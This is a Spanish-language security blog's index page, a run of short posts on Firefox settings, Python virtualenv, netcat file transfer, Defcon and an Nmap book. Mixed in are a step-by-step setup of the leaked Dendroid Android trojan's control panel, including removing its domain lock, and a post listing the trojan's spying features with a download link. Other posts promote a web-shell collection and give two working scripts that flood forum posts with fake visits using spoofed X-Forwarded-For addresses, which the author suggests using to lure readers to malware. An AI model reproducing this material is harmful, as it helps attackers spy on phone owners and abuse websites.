http://formaldocs.com/files/images/cookie-monster39332.jpeg

Hoy me levante temprano debido a que saldré fuera de la ciudad y toca alejarme un poquito de la tecnología, como todos los dias al levantarme me pongo presto a trabajar, ingresar a mi cuenta de GMAIL y ver que novedades encuentro, grata fue mi sorpresa al ver este error:

cookies enabled, Oops! Your browser seems to have cookies disabled. Make sure cookies are enabled or try opening a new browser window

Bueno elimino las cookies y listo, o ustedes no harían lo mismo?

Tras eliminar Cookies ¬_¬°, la cosa empeoro, miren porque.


Oppssss!
Emmmmm cookies deshabilitadas?, pero si solo procedí a eliminar las cookies como me lo pidío. Referencia para eliminar cookies en Firefox -> https://support.mozilla.org/en-US/kb/websites-say-cookies-are-blocked-unblock-them

Procedo a revisar como es natural si las cookies las desabilite no vaya a ser que andando en modo Zombie haya destrozado algo, ya que me paso con anterioridad, revisando y viendo todo anda bien, entonces me puse un momento a buzear en el support de  Mozilla.org y grata fue la sorpresa que esto es un bug de la versión 34  y como ando en Nightly, me gusta vivir al extremo ;).

Bug reportado

bug 1059074 - Cannot log in to Google Accounts


Así que como todas las cosas en el mundo de la informática casi todas, tenemos un Workaround que fue compartido por cor-el   el cual nos indica ir al about:config y hacer el siguiente cambio.



Acceso al abot:config
Debemos de buscar network.http.spdy.enabled.http2draft como se ve en la imagen.

Valor Network.http.spdy.enabled.http2draft
Se ve que anda en valor true por lo tanto, debemos de cambiar a false, tras esto todo volvera a la normalidad.

Valor booleando en false

Una entrada nueva que salio sin querer queriendo diría yo!.
 
Regards,
Snifer
Leer Mas
http://1.bp.blogspot.com/-8DhrncUTCIo/ThWCUyWDxFI/AAAAAAAAEZI/GDmAb4GC2OU/s1600/sandbox.jpg
Virtual enviroment es por decirlo el gemelo de rvm, para ruby el cual vimos hace un par de años atras en el blog Gestionando ruby con ayuda de rvm, esta vez  lo necesitaba debido a que ando migrando a Optimus en mi Manjarito, desde ahora Optimus se llamara Shaka (el fork personal que le dimos con el gringo ;) ). Pronto estarán  con mas noticias y el porque decidí sacar a Optimus de Bugtraq, por cierto Cristhian si logras ver esta entrada excelente el código de Optimus, y la idea buenísima felicidades.


Pero bueno la entrada no es para hablar de la araña :3, mas todo lo contrario es poder explicar que son los entornos virtuales en python, y como trabajar con ellos, para ello comenzaremos realizando la instalación de  virtualenv con ayuda de pip.

[snifer@rizel Desktop]$ sudo pip install virtualenv
[sudo] password for snifer: 
Downloading/unpacking virtualenv
  Downloading virtualenv-1.11.6-py2.py3-none-any.whl (1.6MB): 1.6MB downloaded
Installing collected packages: virtualenv
Successfully installed virtualenv
Cleaning up...

Al tener ya instalado procedemos a crear nuestro entornos virtuales para ello crearemos en nuestro home la carpeta .virtualenv y nos dirigimos a dicho folder como se ve a continuación.

[snifer@rizel Desktop]$  cd $HOME
[snifer@rizel Desktop]$ mkdir ./virtualenv
[snifer@rizel Desktop]$ cd virtualenv

Ahora ya situados en la carpeta .virtualenv procedemos a crear nuestro entorno en mi caso hare uno con python2.7:

[snifer@rizel virtualenv]$ virtualenv --distribute --python=/usr/bin/python2.7 python2.7
Running virtualenv with interpreter /usr/bin/python2.7
New python executable in python2.7/bin/python2.7
Also creating executable in python2.7/bin/python
Installing setuptools, pip...done.


Ya tenemos creado nuestro entorno virtual lo activaremos.

[snifer@rizel virtualenv]$  source ./python2.7/bin/activate

Tras ello tendremos como resultado:

(python2.7)[snifer@rizel virtualenv]$ 

Ahora me diran pero como se que ando bien, lanzen python y veran que version tienen observen en otra terminal y es diferente.


Para salir del entorno tipeamos deactivate y estaremos en una sesión normal.

(python2.7)[snifer@rizel virtualenv]$ deactivate

Así de simple tenemos configurado nuestro entorno virtual para trabajar con python en este sector podemos hacer experimentos a modo de ejemplo procedo a instalar aiml.



Una excelente herramienta para ir desarrollando y probando sin romper nuestro entorno dentro del entorno podemos ir moviendonos entre carpetas es decir ir a otro y poder ejecutar todo con la versión actual del entorno, espero les agrade y un saludo.

Regards,
Snifer

Leer Mas
 http://gadgetshow.channel5.com/upload/asset/0000/4724/BadUSB-3_copy.jpg
Al fin puedo ver la presentación de BadUSB completa después de varios días de andar a full con el trabajo, después de tener permiso para matar, y dar la autopsia respectiva al muerto ya tengo algo de tiempo para ver lo que andaba en la cola de espera, y les hablo del famoso Bad USB, justo en este momento me encuentro viendo la ponencia, llevo mas o menos 10 minutos viéndolo.


La presentación para los que la deseen esta disponible en el siguiente enlace de SRLabs  ahora viene la pregunta este mal estará de por vida? o vendrá una nueva generación en estos días andaré con  un análisis de esta vulnerabilidad mas que todo sera, una observación personal.

Mientras tanto seguimos con las entradas diarias :) otro mes mas que esta por terminar...

Regards,
Snifer
Leer Mas
http://i.imgur.com/448XydF.png

El dia Lunes vinimos con el Source de Dendroid el troyano para Android que anda dando mucho de que hablar, desde que fue descubierto y ahora aun mas con el código expuesto las firmas de los antivirus andarán mas atentas, para pillar algunas variantes que ya es una realidad que las hay.

Debido a ello en el blog andaremos jugando con este bichito dándole otro uso que no sea el de infectar por infectar si no, todo lo contrario será el de experimentar y conocer mas a fondo como tambien darle un uso etico o eso trataremos.

Para esta primera etapa que es la configuración la realizaremos en un entorno Windows, la próxima entrada la haremos desde Linux, la verdad seria lo mismo solo que por comodidad ya que tengo un windows7 con xampp y lo necesario para que funcione, para linux lo haremos luego ;) primero necesitamos tener instalado un Apache, MySQL, PHP, PhpMyadmin por facilidad, ya que el resto depende de cada uno de usted para configurarlo y tenerlo presto.

Tras tener nuestro entorno listo procedemos a descargar por si no lo tienen a Dendroid, tras ello pasamos el archivo Dendroid Panel.zip.


 Llegamos a descomprimir moviéndolo al httdocs, www segun el entorno que tengan configurado, con eso se diría bingo se termino :) ya tenemos el panel listo para jugar, pero señores no es asi :P si ingresamos a localhost/Panel o 127.0.0.1/Panel tendremos el siguiente mensaje.

Asì que para hacer un bypass totalmente pro, lo que debemos de hacer es dirigirnos al archivo  reg.php y abrirlo con nuestro editor de texto favorito mi caso el sepsi sublime.

Se tiene marcado ww.pizzachip.com y pizzachip.com, estas dos url deben de ser cambiadas por el dominio o host donde lo lleguen a subir el panel, es decir si lo suben a www.sniferl4bs.com deberan de cambiarlo por ello, es para permitir la ejecucion de los scripts en un dominio, por lo que vi el paquetito podia ser comprado ya configurado para un host especifico es decir, si lo querian para uso personal, yo como tenedor del source les vendia ya configurado y seteado para su host  y solo en ese funcionaba, claro al pasar sugieren en su README, hacer uso de IonCube.

Despues de dicha tarea procedemos a dirigirnos a PhpMyadmin o bien desde linea de comando, creamos una base de datos nueva el nombre que deseemos y le pasamos las sentencias para que cree nuestra bd ;).



Despues de ello nos aparecera First Time Setup, que es la primera etapa para la configuracion, de aquì para adelante ya es el clasico Siguientes, Siguientes Siguiente, pero como el post es configurarlo y setearlo desde  0 lo haremos paso a paso.



Tendremos la pantalla de arriba ahi accedemos todas las configuraciones necesarias para que funcione correctamente, pueden ver no hay mucha ciencia, lo unico que recomiendo en el proceso de instalacion es que tengamos, un usuario especifico  que tenga acceso solo a esta BD mas que todo es por seguridad nunca esta de mas ;).


Si todo anda color de rosas,  y bientenemos el panel de login algo simple y sencillo por lo visto.



Asi que tras ingresar nuestro usuario y contraseña configurados antes, podremos acceder al mando de control, si llegaron a este panel ya tenemos debidamente configurado el Panel de administración.




Hasta este punto llegamos el dia de hoy, posterior a ello iremos montando el centro de control para hacer las pruebas necesarias y jugar un poco mas.


Ya saben espero recibir  criticas, mas que todo constructivas que las de trolls ando filtrando ;).

Regards,
Snifer

Leer Mas
Nuevamente con otra de mis locuras en esta oportunidad quiero compartir con todos ustedes, una colección personal de Ezines gran parte de ellas son de la vieja escuela lo tengo ya un par de años, esta idea vino hace tiempo cuando se posteaba una colección semanal aquí pueden ver la pagina,  es cierto que gran parte de este material lo tenemos disponible en algunos sitios que aun lo mantienen pero se da el caso, que aveces el sitio decide morir o dejan de continuar con la tarea, por ello se me vino a la mente la idea de armar este repositorio y si alguien tiene otros papers porque no hacer el pull-request respectivo, alguos de estos Ezine Merce los nombra en el libro HackStory que por cierto es bastante interesante ;), los invito a leer  y le den una mirada.

Ahora si el proyecto como tal lo tengo en Github igual que L4bs For Shell que es un repositorio de Web Shells estos días actualizare con un par nuevo que encontre por cierto, ya lleva 2 forks :) eso motiva a seguir adelante.

Espero les agrade esta otra locura...

Por problemas mayores estos dias ando posteando a medio dia y no a media noche U_u maldita salud.

Regards,
Snifer
Leer Mas
Hola el dia de hoy me puse un poco con github y las github pages para montar el sitio o intento de sitio, ya que Merce andaba en busca de alguna forma de compartirlo por ello me puse manos a la obra y walla! se armo sin mucho que discutir, es un sitio no oficial el cual ire actualizando si viene nuevas versiones como ser pdf y demas trajes, al menos no mucho trabajo debido a que  por culpa de Amazon no pude montarlo el .mobi el cual estaba presto ya convertido.

Segun merce estara disponible en menos de 48 hrs y para piratear me encargo yo :3 .. eso mas que un hecho, pero mientras a descargarlo en .epub y disfrutar de el.

Descarga el libro: HackStory

PD: Cabe resaltar que las donaciones no son para mi! si no para el proyecto de Mercé, por lo tanto los que andan mandando correos abstenerse ;).


Regards
Snifer
Leer Mas



Todos andaban en la busqueda de un troyano para Android desde que salio el conocido RAT AndroRat, asi que ahora salio a la luz gracias a Antrax el admin de Underc0de y un gran amigo mio que lo sacó para afuera, y revisando por ahi di con el punto de Origen que se realizo en Indetectables al menos recien lo llego a ver asi con codigo fuente y todo, el cual es DenDroid ya se supieron varias noticias de este bichito que andaba afectando a montones, Dendroid estába a la venta por el equivalente a 300 dólares en BitCoins, como se dieron cuenta alguien le dio el leak respectivo, e incluso viene el "APK Binder", el cual es el encargado de añadir las características y permisos necesarios de Dendroid a archivos .apk totalmente limpios. 

Por mi parte andare jugando con el en mi Droide muerto ;) para algo tenia que servir muajajaja, algo que destacar de este Troyano es que el server esta via web :) asi que habra entradas relacionadas a este tema y como trabaja el troyano sniffing, Forense!.

Las caracteristicas del troyano son las siguientes:




  1. Ringer Up/Down
  2. Media Up/Down
  3. Screen On
  4. Intercept On/Off
  5. Block SMS On/Off
  6. Record Audio
  7. Record Video
  8. Take Photo Front/Back
  9. Record Calls On/Off
  10. Get:
  11. SMS Inbox/OutBox
  12. Browser History/Bookmarks
  13. Call History
  14. Contacts
  15. User Accounts
  16. Installed Apps
  17. Send SMS
  18. Delete SMS
  19. Send SMS To All Contacts
  20. Call Numbers
  21. Delete Call Log
  22. Open Page
  23. Open Dialog (Toast Notification)
  24. Open App
  25. HTTP Flood
  26. Update App
  27. Transfer Bot
Descarga desde BD Malware Underc0de Aqui

Antes de que digan si tiene algun bichito adicional o algo no me hago responsable ;), tocara analizarlo y ver que tal esta...

Regards,
Snifer
Leer Mas

El sábado comenzamos con el proyecto L4bs for Shell, el cual sera un repositorio orientado a recolectar la mayor cantidad de Web Shells, ya que andamos en esos lares comenzamos la semana con el paper Introducción a las shells con eval(); realizado por Alexander, Harkonnen el cual nos explica como hacer un shell simple y eficaz  ya veran porque les digo ello, sin mas que decir les dejo con el paper.


Autor: Alexander aka. el trollciento :D

Buen inicio de semana...

Regards,
Snifer




Leer Mas
Un par de semanas atras me puse con el desarrollo de TFoX un cliente para Twitter desde el querido FirefoxOS comenzo como un proyecto personal para desarrollar un cliente estable, el cual por motivos de fuerza mayor seria exactamente el trabajo ya que me absorve toda la semana :(  no pude lograr el avance necesario, mil disculpas a @FabianOvrWrt el cual me estuvo colaborando con el logo, y el diseño grafico de la aplicacion aqui pueden ver el logo que realizo gracias!!.


Una pena dejarlo en el olvido a TFoX me preguntaran porque dejarlo? la respuesta se resume a lo siguiente, para que sacar un cliente que compita con uno ya existente, si la idea de FirefoxOS es la de que crescan las aplicaciones y no tener mil calculadoras como las que tenemos ahora para que solo se tenga como objetivo llenar el market place si no tener una o dos pero que sean calidad,  (es lo que pienso ;), por ello lo dejare en descanso y le seguire  dando duro como hobby para que salga el cliente ya no con tanta preción como la de antes.).

Les hablo del cliente Macaw el cual tiene todo lo necesario para ser un cliente dedicado para twitter desde nuestro amigo FirefoxOS, pueden ver algunas capturas del mismo desde mi AOTF, lo que me agrada es que tiene para agregar mas de una cuenta ;)  les dejo con las capturas realizadas.

[DEBO CAPTURAS x_x No encuentro mi cable usb :3]


 
Espero que siga creciendo y mejorando este cliente, veré como ayudar en el desarrollo  y larga vida a ti #TFoX

Regards,
Snifer


Leer Mas
 

Labs for Shells será un repositorio dedicado a reunir las webs shells mas conocidas, como también las poca conocidas, si como lo leen es un proyecto que andaba hace mas de 2 semanas atras en la mente y por tiempo mas que todo no busque lo que tenia referente a shells.

Esta mas que claro que a este repositorio se le puede dar otro uso como por ejemplo un buscador de shells en un servidor de forma automática a partir de los nombres de este repositorio si mal no recuerdo hay un proyecto :| que ya realiza la búsquedas de web shells. (Me acorde!) PHP Shell Detector pero aun así alguien de los chicos que sigo tiene un proyecto :| si lo saben comenten. 

Pero bueno, como les comentaba sera siendo actualizado regularmente con las shells que encuentre, si gustan colaborar no se olviden con un pull-request estarían colaborando a que sea todo un banco de Shells!.

Este es solo el primer proyecto que tengo en mente ya estos días irán enterándose del resto, el repositorio esta en GITHUB. Como siempre espero sus comentarios.

Regards,
Snifer
Leer Mas
La siguiente entrada tal como lo dice el titulo viene de la manao de HielaSangre un viejo conocido amigo no se si decirlo asi, mejor lo dearemos como conocido es que le tengo miedito :3.


Pero ya enserio lo que hace el script realizado por Daniel es incrementar las visitas a una entrada, específicamente de ser dañina no lo es como lo dice el autor pero para andar juegando un ratito sirve y no solo eso, que tal si damos un post de un malware al ver tantas visitas alguien caera, solo digo ;).










Como dice Daniel: Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.

#!/usr/bin/python
# RemoteExecution
#Autor: Daniel Godoy A.K.A hielasangre
 
import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
  def __init__(self, num):
      threading.Thread.__init__(self)
      self.num = num      
  def run(self):
    while 1:
        global a,b,c,d,count, url
        data = ""
        while 1:
            while 1:
                if d!=250:
                    d+=1
                else:
                    if c!= 250:
                        c+=2
                        d=0
                    else:
                        if b!=250:
                            c=0
                            d=0
                            b+=1
                        else:
                            a+=1
                            b=0
                            c=0
                            d=0
                head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
                headers = { 'X-Forwarded-For' : head }
                req = urllib2.Request(url, data, headers)
                f = urllib2.urlopen(req)
                count += 1
                print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
for i in range(3):      
        ta = SMFPwner(i)
        ta.start()

Editado: 23 de Agosto del 2014

Si el título fue cambiado debido a que siguiendo el hilo del foro en Underc0de, Eleven ahora Once, dio a conocer otra forma de realizar este flood espero les agrade :)


import time
    import urllib2
     
     
    class Pvisits(object):
        def __init__(self, url, nvisitas, delay=0):
            headers = {
                "Referer": url,
                "User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
            }
       
            for x in xrange(nvisitas):
                time.sleep(delay)
                request = urllib2.Request(url, headers=headers)
                obj_web = urllib2.urlopen(request)
                codigo = obj_web.code
                if codigo == 200:
                    print obj_web.geturl(), codigo, nvisitas - x
                elif codigo >= 400:
                    print "Ocurrio un error:", codigo
                    return
     
     
    Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)

Fuente: Remoteexecution & Underc0de

Regards,
Snifer




Leer Mas
La entrada de hoy es un aporte de Stuxnet el cual realizo esta entrada en Underc0de y con su permiso la traigo a SniferL4bs el ratón tuvo la mega oportunidad de haber hido a la Defcon 22 :D, en esta entrada nos da una mirada de lo que fue, su experiencia algo corta ¬¬! es cierto espero les agrade.



En las pasadas fechas 7 – 10 de agosto en el Hotel y Casino Rio se celebró el evento de seguridad informática más grande a nivel mundial la DefCon22 la más prestigiosa conferencia hacker anual a nivel mundial.  Entre sus asistentes podemos encontrar desde agentes federales (FBI, CIA) hasta los mejores hackers del mundo y los mas locos que se puedan ver.

El día miércoles 7 nos dispusimos a comprar las entradas con mi amigo wifi, encontrando con una cantidad maravillosa de personas.


Todos haciendo una gran cola para poder obtener este badge hermoso.


Una experiencia única poder estar en la defcon si tienen pensando asistir los animo, se pueden encontrar muchas cosas fascinantes a parte de las charlas, un ejemplo claro serian las villa de social ingenieer, wireless, crypto and privacy, tamper evident y no puede faltar la villas de lockpick, entre muchas otras.


Aparte de las villas no pueden faltar los CTF ( Capture The Flag ) y el CTP ( Capture The Packet ).


También se pueden encontrar cosas curiosas como estas 8) 8) 8) LOL xD


Puedes descargar todas las presentaciones de la defcon22.


Enlace Mega: Descargar Material
 
Contribucion de Stuxnetr00t
 
Regards,
Snifer
Leer Mas
El libro que me regalaron meses, atras...
La primera revisión que se realiza en SniferL4bs y aun mas un orgullo aparte que sea del Libro de Paulino Calderon y no porque sea el si no tuve la suerte de ganármelo hace 2 años atras con un sepsi tweet, aqui esta la entrada que arme  al fin llego mi libro *_*  aun recuerdo la locura que me dio al verlo, lastimosamente por roblemas de salud previos  y demas detalles recien lo termine de leer hace un par de semanas atras, el libro que les hablo es “Nmap 6: Network exploration and security auditing Cookbook”, siempre y cuando no se hayan dado cuenta esta mas que claro.

Este es el tweet que me hizo ganar una locura que vino a mi mente ;).
Ahora si un breve analisis referente al libro, el cual nos da todo lo necesario para poder usar la herramienta de la manera adecuada aun mas al venir de parte de Paulino Calderon el porque de esto lo veran al final del proximo fragmento.

Nos da a conocer toda la suite que tiene nmap, y les hablo de Ncat, Ndiff, Nping la cual vimos algo de ello en esta entrada en el blog Nmap toda una suite de Seguridad , posterior a ello nos da toda la receta necesaria para realizar el reconocimiento respectivo con Nmap hasta llegamos a ver un overload a la herramienta por medio de sus NSE (Nmap Script Engine) convirtiendolo en una herramienta de explotación, hasta llegamos a la creación de nuestros propios NSE decirles si no ando mal  y la memoria no me falla Paulino es el creador de los NSE si no me equivoco cabe resaltar que en este punto ando medio perdido xD, pero nos vamos al caso que el colaboro en el Google summer Code del 2011 con el overload a Nmap con la tutoria del mismo autor de Nmap y les hablo de Fyodor.

Que les puedo decir algo que no resuma que si no lo leyeron, se pierden una excelente lectura y amena y con ganas de ir jugando cada rato, este tiempo que me encuentro lejos me sirvio para leerlo, y ahora mas para ir armando entradas relacionadas a NMAP.

El resultado final del libro es de 5 Dinosaurios ;), nada de estrellitas aqui  a lo Snifer.
Snifer@L4b'sSnifer@L4b'sSnifer@L4b'sSnifer@L4b'sSnifer@L4b's

Repito U_u le hubiese dado 6 XD sobrepasando los 5 dinos al libro pero no me autografio :'(....

Regards,
Snifer
Leer Mas
http://www.netcat.li/images/Logo.gif
Necesitaba quitar el molestos mensajito que aparece con SublimeText :3 (juackearlo :P) si señores.... volví al lado juackeroso,el porque necesito si es gratis, por el molestoso mensaje, al que no le guste ni modo en otra entrada, vendra algo relacionado a ello para los que gusten, si no una googleada y tendrían lo que necesitan.

Pero bueno, cuando necesitamos pasar algún archivo lo que se nos viene a la mente es el estimadisimo USB, pero a veces es muy moroso diria incomodo el de andar pasando cada rato por alguna modificación, por ello es mas fácil hacer uso de Netcat con este cometido.

Primero necesitamos que ambos hosts o bien a los que se desee compartir tengan instalado Netcat. Tras esto lo que se tiene que hacer es compartir algún archivo (compartir = dar, enviar me entienden xD) entonces lo que queria era que me pase la licencia de Sublime,  lo cual se pudo realizar con ayuda de  Netcat.



Lo que hacemos es entrar a la terminal y hacer uso del siguiente comando, primero hacemos es llmar  a netcat luego indicamos el puerto, y el archivo a compartir el -q 0 es para indicar que al terminar de pasar el archivo cierre la conexión.

lizbeth@kandinsky:~$ nc -l -p 1351 < sublime_license.txt -q 0


Luego en el equipo que se desea recibir el archivo, hacemos lo siguiente:



Ahora lo que haremos es en el cliente ingresar la direccion IP seguido del archivo a ser bajado.

snifer@rizel:~$ sudo nc 192.168.1.2 1351 > sublime_license.txt 


Facil de usar,  y simple  aun mas para los amantes de la consola, en lo persona recien aprendi a hacer uso de netcat de esta manera especifica, recuerdo haberla visto en su momento pero la mente es fragil asi que toco recordarlo en su momento.

No se olviden que hace tiempo  se tiene la entrada Jugando con netcat un simple chat, la cual forma parte de las entradas Jugando con Netcat espero poder ir descubriendo nuevos asuntos e ir compartiendo.

Regards,
Snifer
Leer Mas